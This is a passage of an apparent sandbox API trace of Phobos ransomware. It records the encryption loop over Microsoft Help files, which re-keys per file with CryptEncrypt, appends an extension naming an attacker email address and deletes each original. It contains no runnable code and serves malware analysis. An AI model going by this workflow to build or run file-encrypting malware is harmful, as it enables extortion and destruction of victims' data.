(hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.322] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.322] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.322] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.322] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.322] CloseHandle (hObject=0x180) returned 1 [0178.322] CloseHandle (hObject=0x140) returned 1 [0178.322] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn")) returned 1 [0178.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.323] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.324] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=338) returned 1 [0178.324] CloseHandle (hObject=0x140) returned 1 [0178.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn")) returned 0x2022 [0178.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.324] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.324] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.324] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.324] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x152, lpOverlapped=0x0) returned 1 [0178.325] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.325] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.326] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.326] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.326] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.326] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.326] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.326] CloseHandle (hObject=0x140) returned 1 [0178.326] CloseHandle (hObject=0x180) returned 1 [0178.326] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn")) returned 1 [0178.327] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.327] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.327] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=326) returned 1 [0178.327] CloseHandle (hObject=0x180) returned 1 [0178.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn")) returned 0x2022 [0178.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.328] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.328] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.328] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.328] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.328] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.328] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.328] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x146, lpOverlapped=0x0) returned 1 [0178.329] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0178.329] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x150, lpOverlapped=0x0) returned 1 [0178.330] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.330] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.330] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.330] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.330] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.330] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.330] CloseHandle (hObject=0x180) returned 1 [0178.330] CloseHandle (hObject=0x140) returned 1 [0178.330] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn")) returned 1 [0178.331] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.331] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.331] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=350) returned 1 [0178.331] CloseHandle (hObject=0x140) returned 1 [0178.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn")) returned 0x2022 [0178.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.332] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.332] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.332] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.332] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.332] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.332] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x15e, lpOverlapped=0x0) returned 1 [0178.333] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.333] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.334] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.334] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.334] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.334] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.334] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.334] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.334] CloseHandle (hObject=0x140) returned 1 [0178.334] CloseHandle (hObject=0x180) returned 1 [0178.334] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn")) returned 1 [0178.335] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.335] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.335] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=392) returned 1 [0178.335] CloseHandle (hObject=0x180) returned 1 [0178.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn")) returned 0x2022 [0178.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.336] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.336] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.336] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.336] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.336] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.336] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x188, lpOverlapped=0x0) returned 1 [0178.337] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0178.337] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0178.338] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.338] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.338] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.338] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.338] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.338] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.338] CloseHandle (hObject=0x180) returned 1 [0178.338] CloseHandle (hObject=0x140) returned 1 [0178.338] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn")) returned 1 [0178.339] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.339] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.339] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=350) returned 1 [0178.339] CloseHandle (hObject=0x140) returned 1 [0178.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn")) returned 0x2022 [0178.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.339] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.340] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.340] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.340] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.340] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.340] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.340] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x15e, lpOverlapped=0x0) returned 1 [0178.341] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.341] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.342] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.342] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.342] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.342] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.342] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.342] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.342] CloseHandle (hObject=0x140) returned 1 [0178.342] CloseHandle (hObject=0x180) returned 1 [0178.342] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn")) returned 1 [0178.343] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.343] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.343] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=350) returned 1 [0178.343] CloseHandle (hObject=0x180) returned 1 [0178.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn")) returned 0x2022 [0178.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.343] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.344] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.344] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 